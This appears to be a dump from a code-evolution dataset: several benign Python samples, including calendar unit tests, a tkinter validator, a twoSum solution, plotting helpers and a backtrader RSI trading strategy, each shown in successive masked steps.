"step-2": "<mask token>\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n\n def test_zeller_again(self):\n cal = Month(6, 2999)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n\n def test_zeller_again(self):\n cal = Month(6, 2999)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n\n def test_format_days(self):\n cal = Month(2, 1990)\n expected = [' ', ' ', ' ', ' ', ' 1', ' 2', ' 3', ' 4', ' 5',\n ' 6', ' 7', ' 8', ' 9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '21', '22', '23', '24', '25',\n '26', '27', '28']\n self.assertEqual(expected, cal.format_days())\n",
"step-4": "import unittest\nfrom month import Month\n\n\nclass MonthUnitTests(unittest.TestCase):\n\n def test_header(self):\n cal = Month(5, 2012)\n result = cal.header()\n self.assertEqual(' May 2012', result)\n\n def test_header_different_month(self):\n cal = Month(3, 2012)\n result = cal.header()\n self.assertEqual(' March 2012', result)\n\n def test_zeller(self):\n cal = Month(3, 1995)\n result = cal.zeller()\n self.assertEqual(3, result)\n\n def test_zeller_again(self):\n cal = Month(6, 2999)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_january(self):\n cal = Month(1, 2000)\n self.assertEqual(6, cal.zeller())\n\n def test_zeller_february(self):\n cal = Month(2, 2000)\n self.assertEqual(2, cal.zeller())\n\n def test_number_of_days(self):\n cal = Month(6, 1900)\n self.assertEqual(30, cal.days_number())\n\n def test_number_of_days_february(self):\n cal = Month(2, 1995)\n self.assertEqual(28, cal.days_number())\n\n def test_number_of_days_leap_year(self):\n cal = Month(2, 1996)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_leap_century(self):\n cal = Month(2, 2000)\n self.assertEqual(29, cal.days_number())\n\n def test_number_of_days_non_leap_century(self):\n cal = Month(2, 1900)\n self.assertEqual(28, cal.days_number())\n\n def test_blank_spaces(self):\n cal = Month(2, 1990)\n self.assertEqual([' ', ' ', ' ', ' '], cal.spaces())\n\n def test_days(self):\n cal = Month(2, 1990)\n expected = [' 1', ' 2', ' 3', ' 4', ' 5', ' 6', ' 7', ' 8', ' 9',\n '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',\n '20', '21', '22', '23', '24', '25', '26', '27', '28']\n self.assertEqual(expected, cal.days())\n\n def test_format_days(self):\n cal = Month(2, 1990)\n expected = [' ', ' ', ' ', ' ', ' 1', ' 2', ' 3', ' 4', ' 5',\n ' 6', ' 7', ' 8', ' 9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '21', '22', '23', '24', '25',\n '26', '27', '28']\n self.assertEqual(expected, cal.format_days())\n",
"step-5": "import unittest\nfrom month import Month\n\nclass MonthUnitTests(unittest.TestCase):\n\n\tdef test_header(self):\n\t\tcal = Month(5, 2012)\n\t\tresult = cal.header()\n\t\tself.assertEqual(\" May 2012\", result)\n\n\tdef test_header_different_month(self):\n\t\tcal = Month(3, 2012)\n\t\tresult = cal.header()\n\t\tself.assertEqual(\" March 2012\", result)\n\n\tdef test_zeller(self):\n\t\tcal = Month(3, 1995)\n\t\tresult = cal.zeller()\n\t\tself.assertEqual(3, result)\n\n\tdef test_zeller_again(self):\n\t\tcal = Month(6, 2999)\n\t\tself.assertEqual(6, cal.zeller())\n\n\tdef test_zeller_january(self):\n\t\tcal = Month(1, 2000)\n\t\tself.assertEqual(6, cal.zeller())\n\n\tdef test_zeller_february(self):\n\t\tcal = Month(2, 2000)\n\t\tself.assertEqual(2, cal.zeller())\n\n\tdef test_number_of_days(self):\n\t\tcal = Month(6, 1900)\n\t\tself.assertEqual(30, cal.days_number())\n\n\tdef test_number_of_days_february(self):\n\t\tcal = Month(2, 1995)\n\t\tself.assertEqual(28, cal.days_number())\n\n\tdef test_number_of_days_leap_year(self):\n\t\tcal = Month(2, 1996)\n\t\tself.assertEqual(29, cal.days_number())\n\n\tdef test_number_of_days_leap_century(self):\n\t\tcal = Month(2, 2000)\n\t\tself.assertEqual(29, cal.days_number())\n\n\tdef test_number_of_days_non_leap_century(self):\n\t\tcal = Month(2, 1900)\n\t\tself.assertEqual(28, cal.days_number())\n\n\tdef test_blank_spaces(self):\n\t\tcal = Month(2, 1990)\n\t\tself.assertEqual([\" \",\" \",\" \",\" \"], cal.spaces())\n\n\tdef test_days(self):\n\t\tcal = Month(2, 1990)\n\t\texpected = [\" 1\",\" 2\",\" 3\",\" 4\",\" 5\",\" 6\",\" 7\",\" 8\",\" 9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\"]\n\t\tself.assertEqual(expected, cal.days())\n\n\tdef test_format_days(self):\n\t\tcal = Month(2, 1990)\n\t\texpected = [\" \",\" \",\" \",\" \",\" 1\",\" 2\",\" 3\",\" 4\",\" 5\",\" 6\",\" 7\",\" 8\",\" 
9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\"]\n\t\tself.assertEqual(expected, cal.format_days())",
"step-ids": [
13,
14,
15,
16,
17
]
}
|
[
13,
14,
15,
16,
17
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequiredEntry(ValidatedMixin, ttk.Entry):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RequiredEntry(ValidatedMixin, ttk.Entry):
def _focusout_validate(self, event):
valid = True
if not self.get():
valid = False
self.error.set('A value is required')
return valid
<|reserved_special_token_1|>
from tkinter import ttk
from chapter04a.validated_mixin import ValidatedMixin
class RequiredEntry(ValidatedMixin, ttk.Entry):
def _focusout_validate(self, event):
valid = True
if not self.get():
valid = False
self.error.set('A value is required')
return valid
|
flexible
|
{
"blob_id": "59047a113d76c64be48858258441fae5da505790",
"index": 5792,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass RequiredEntry(ValidatedMixin, ttk.Entry):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass RequiredEntry(ValidatedMixin, ttk.Entry):\n\n def _focusout_validate(self, event):\n valid = True\n if not self.get():\n valid = False\n self.error.set('A value is required')\n return valid\n",
"step-4": "from tkinter import ttk\nfrom chapter04a.validated_mixin import ValidatedMixin\n\n\nclass RequiredEntry(ValidatedMixin, ttk.Entry):\n\n def _focusout_validate(self, event):\n valid = True\n if not self.get():\n valid = False\n self.error.set('A value is required')\n return valid\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def twoSum(self, numbers, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
idx1 = 0
idx2 = len(numbers) - 1
while idx1 < idx2:
left = numbers[idx1]
right = numbers[idx2]
if left + right < target:
idx1 += 1
elif left + right > target:
idx2 -= 1
else:
return [idx1 + 1, idx2 + 1]
<|reserved_special_token_1|>
class Solution(object):
def twoSum(self, numbers, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
idx1 = 0
idx2 = len(numbers)-1
while(idx1<idx2): # can also use a for-loop: for num in numbers:
left = numbers[idx1]
right = numbers[idx2]
if (left + right) < target:
idx1 += 1
elif (left + right) > target:
idx2 -= 1
else:
return [idx1+1,idx2+1]
|
flexible
|
{
"blob_id": "51b3beee8659bccee0fbb64b80fdce18b693674b",
"index": 9481,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def twoSum(self, numbers, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n idx1 = 0\n idx2 = len(numbers) - 1\n while idx1 < idx2:\n left = numbers[idx1]\n right = numbers[idx2]\n if left + right < target:\n idx1 += 1\n elif left + right > target:\n idx2 -= 1\n else:\n return [idx1 + 1, idx2 + 1]\n",
"step-4": "class Solution(object):\n def twoSum(self, numbers, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n idx1 = 0\n idx2 = len(numbers)-1\n while(idx1<idx2): # can also use a for-loop: for num in numbers: \n left = numbers[idx1]\n right = numbers[idx2]\n if (left + right) < target:\n idx1 += 1\n elif (left + right) > target:\n idx2 -= 1\n else:\n return [idx1+1,idx2+1]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python3
################################################################################
# Usefull functions to shorten some of my plotting routine #####################
################################################################################
import matplotlib.pyplot as plt
import seaborn as sns
import uncertainties as uc
def set_sns_standard(context = 'paper', font_scale=1.4, linewidth=1.5, font='serif'):
rc_params = {'lines.linewidth':linewidth, 'text.usetex':True}
sns.set(style='ticks', font=font, palette='Set1', context=context, font_scale=font_scale, rc=rc_params)
def remove_ticks(axe, top=True, right=True):
if right:
plt.tick_params(
axis='y', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
left='on', # ticks along the bottom edge are off
right='off', # ticks along the top edge are off
labelright='off') # labels along the bottom edge are off
if top:
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='on', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelbottom='on') # labels along the bottom edge are off
def plot_function_w_uc(axe, x, function, par_uc, **kwargs):
"""Plots a function with shaded area for uncertainties.
:axe: subfigure to plot on
:x: x-values to plot on
:function: function to plot, should be a function with full
support for uncertainties
:par_uc: parameters using uncertainties.correlated_values
"""
result_uc = function(x, *par_uc)
result_n = uc.unumpy.nominal_values(result_uc)
result_std = uc.unumpy.std_devs(result_uc)
result_upper = result_n + result_std
result_lower = result_n - result_std
line = axe.plot(x, result_n, **kwargs)
color = line[0].get_color() #????
axe.fill_between(x, result_lower, result_upper, color=color, alpha=.3)
|
normal
|
{
"blob_id": "b935c48210b1965ebb0de78384f279b71fc17d5d",
"index": 7044,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef set_sns_standard(context='paper', font_scale=1.4, linewidth=1.5, font=\n 'serif'):\n rc_params = {'lines.linewidth': linewidth, 'text.usetex': True}\n sns.set(style='ticks', font=font, palette='Set1', context=context,\n font_scale=font_scale, rc=rc_params)\n\n\n<mask token>\n\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color()\n axe.fill_between(x, result_lower, result_upper, color=color, alpha=0.3)\n",
"step-3": "<mask token>\n\n\ndef set_sns_standard(context='paper', font_scale=1.4, linewidth=1.5, font=\n 'serif'):\n rc_params = {'lines.linewidth': linewidth, 'text.usetex': True}\n sns.set(style='ticks', font=font, palette='Set1', context=context,\n font_scale=font_scale, rc=rc_params)\n\n\ndef remove_ticks(axe, top=True, right=True):\n if right:\n plt.tick_params(axis='y', which='both', left='on', right='off',\n labelright='off')\n if top:\n plt.tick_params(axis='x', which='both', bottom='on', top='off',\n labelbottom='on')\n\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color()\n axe.fill_between(x, result_lower, result_upper, color=color, alpha=0.3)\n",
"step-4": "import matplotlib.pyplot as plt\nimport seaborn as sns\nimport uncertainties as uc\n\n\ndef set_sns_standard(context='paper', font_scale=1.4, linewidth=1.5, font=\n 'serif'):\n rc_params = {'lines.linewidth': linewidth, 'text.usetex': True}\n sns.set(style='ticks', font=font, palette='Set1', context=context,\n font_scale=font_scale, rc=rc_params)\n\n\ndef remove_ticks(axe, top=True, right=True):\n if right:\n plt.tick_params(axis='y', which='both', left='on', right='off',\n labelright='off')\n if top:\n plt.tick_params(axis='x', which='both', bottom='on', top='off',\n labelbottom='on')\n\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color()\n axe.fill_between(x, result_lower, result_upper, color=color, alpha=0.3)\n",
"step-5": "#!/usr/bin/python3\n\n\n################################################################################\n# Usefull functions to shorten some of my plotting routine #####################\n################################################################################\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport uncertainties as uc\n\ndef set_sns_standard(context = 'paper', font_scale=1.4, linewidth=1.5, font='serif'):\n rc_params = {'lines.linewidth':linewidth, 'text.usetex':True}\n sns.set(style='ticks', font=font, palette='Set1', context=context, font_scale=font_scale, rc=rc_params)\n\ndef remove_ticks(axe, top=True, right=True):\n if right:\n plt.tick_params(\n axis='y', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n left='on', # ticks along the bottom edge are off\n right='off', # ticks along the top edge are off\n labelright='off') # labels along the bottom edge are off\n if top:\n plt.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom='on', # ticks along the bottom edge are off\n top='off', # ticks along the top edge are off\n labelbottom='on') # labels along the bottom edge are off\n\ndef plot_function_w_uc(axe, x, function, par_uc, **kwargs):\n \"\"\"Plots a function with shaded area for uncertainties.\n\n :axe: subfigure to plot on\n :x: x-values to plot on\n :function: function to plot, should be a function with full \n support for uncertainties\n :par_uc: parameters using uncertainties.correlated_values\n \"\"\"\n result_uc = function(x, *par_uc)\n result_n = uc.unumpy.nominal_values(result_uc)\n result_std = uc.unumpy.std_devs(result_uc)\n result_upper = result_n + result_std\n result_lower = result_n - result_std\n\n line = axe.plot(x, result_n, **kwargs)\n color = line[0].get_color() #????\n \n axe.fill_between(x, result_lower, result_upper, color=color, alpha=.3)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#This is just a test
print("this is something new")
for a in range(10):
print(sum(a))
print("the loop worked")
|
normal
|
{
"blob_id": "df317e914073f5b236f73b616b87f86ae378ef38",
"index": 8755,
"step-1": "<mask token>\n",
"step-2": "print('this is something new')\nfor a in range(10):\n print(sum(a))\nprint('the loop worked')\n",
"step-3": "#This is just a test\nprint(\"this is something new\")\nfor a in range(10):\n print(sum(a))\nprint(\"the loop worked\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def play():
print("playing tank games...")
print("runing tank now!!!")
|
normal
|
{
"blob_id": "8c7fe90972feec19e280d3bccd39391af666608a",
"index": 9410,
"step-1": "<mask token>\n",
"step-2": "def play():\n print('playing tank games...')\n\n\n<mask token>\n",
"step-3": "def play():\n print('playing tank games...')\n\n\nprint('runing tank now!!!')\n",
"step-4": "def play():\n print(\"playing tank games...\")\nprint(\"runing tank now!!!\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
print((9*int(input())/5)+32)
|
normal
|
{
"blob_id": "4e9a968842c2b3eca79690f0b56c8e176b203138",
"index": 362,
"step-1": "<mask token>\n",
"step-2": "print(9 * int(input()) / 5 + 32)\n",
"step-3": "print((9*int(input())/5)+32)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
<|reserved_special_token_0|>
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
<|reserved_special_token_0|>
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and
self.buyAlert):
size = round(self.broker.getcash() / self.data, 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
if self.position.size != 0:
if self.rsi_4 > 67:
self.sellAlert1 = True
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
if self.rsi_4 > 85:
self.sellAlert2 = True
if self.rsi_4 < 80 and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
if 0.82 * self.order.executed.price > self.datas[0
].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
def log(self, txt, dt=None):
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and
self.buyAlert):
size = round(self.broker.getcash() / self.data, 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
if self.position.size != 0:
if self.rsi_4 > 67:
self.sellAlert1 = True
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
if self.rsi_4 > 85:
self.sellAlert2 = True
if self.rsi_4 < 80 and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
if 0.82 * self.order.executed.price > self.datas[0
].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
<|reserved_special_token_1|>
import backtrader as bt
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
def log(self, txt, dt=None):
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log('BUY Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log('SELL Executed at price: {} with size: {}'.
format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
if (self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and
self.buyAlert):
size = round(self.broker.getcash() / self.data, 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
if self.position.size != 0:
if self.rsi_4 > 67:
self.sellAlert1 = True
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
if self.rsi_4 > 85:
self.sellAlert2 = True
if self.rsi_4 < 80 and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
if 0.82 * self.order.executed.price > self.datas[0
].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
<|reserved_special_token_1|>
import backtrader as bt
class RSIStrategy(bt.Strategy):
def __init__(self):
self.order = None
self.position.size = 0
self.sellAlert1 = False
self.sellAlert2 = False
self.buyAlert = False
self.failureNum = 0
self.successNum = 0
self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)
self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)
self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)
self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)
def log(self, txt, dt=None):
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def notify_order(self, order):
if order.status in [order.Completed]:
if order.isbuy():
return self.log(
'BUY Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))
elif order.issell():
print('Succeeded for {} times.'.format(self.successNum))
return self.log(
'SELL Executed at price: {} with size: {}'.format(order.executed.price, order.executed.size))
def next(self):
"""Here the conditions for openinng and closing a position have been set."""
if self.position.size == 0:
# The condition for activating BUY function --> By checking oversold condition.
if self.rsi_2 < 30 and self.rsi_3 < 40:
self.buyAlert = True
# If BUY is activated and below conditions are met, then aa buy order would be placed.
if self.rsi_1 < 50 and self.rsi_2 > 30 and self.rsi_3 > 25 and self.buyAlert:
size = round((self.broker.getcash() / self.data), 3)
self.order = self.buy(size=size)
self.buyAlert = False
print(round(self.broker.get_cash(), 1))
# print(self.datas[0].low[0])
if self.position.size != 0:
# The condition for activating SELL_1 function --> Waiting for RSI to reach overbought zone.
if self.rsi_4 > 67:
self.sellAlert1 = True
# If SELL_1 is activated and below conditions are met, then a sell order would be placed.
if (self.rsi_1 < 70 and self.rsi_4 < 60) and self.sellAlert1:
self.close()
self.successNum += 1
self.sellAlert1 = False
# The condition for activating SELL_2 function --> Activated at overbought condition with RSI>85
if self.rsi_4 > 85:
self.sellAlert2 = True
# If SELL_2 is activated and below conditions are met, then a sell order would be placed.
if (self.rsi_4 < 80) and self.sellAlert2:
self.close()
self.successNum += 1
self.sellAlert1 = False
self.sellAlert2 = False
# Setting Stop Loss for wrongly opened position.
if 0.82 * self.order.executed.price > self.datas[0].close > 0.8 * self.order.executed.price:
self.close()
self.failureNum += 1
print('Shit !!! Failed for {} times.'.format(self.failureNum))
|
flexible
|
{
"blob_id": "9119fc1c75de980bbcf74f1e06a36ba587fc490b",
"index": 102,
"step-1": "<mask token>\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n <mask token>\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RSIStrategy(bt.Strategy):\n\n def __init__(self):\n self.order = None\n self.position.size = 0\n self.sellAlert1 = False\n self.sellAlert2 = False\n self.buyAlert = False\n self.failureNum = 0\n self.successNum = 0\n self.rsi_1 = bt.ind.RSI(self.datas[0].close, period=7)\n self.rsi_2 = bt.ind.RSI(self.datas[1].close, period=7)\n self.rsi_3 = bt.ind.RSI(self.datas[2].close, period=7)\n self.rsi_4 = bt.ind.RSI(self.datas[3].close, period=7)\n <mask token>\n\n def notify_order(self, order):\n if order.status in [order.Completed]:\n if order.isbuy():\n return self.log('BUY Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n elif order.issell():\n print('Succeeded for {} times.'.format(self.successNum))\n return self.log('SELL Executed at price: {} with size: {}'.\n format(order.executed.price, order.executed.size))\n\n def next(self):\n \"\"\"Here the conditions for openinng and closing a position have been set.\"\"\"\n if self.position.size == 0:\n if 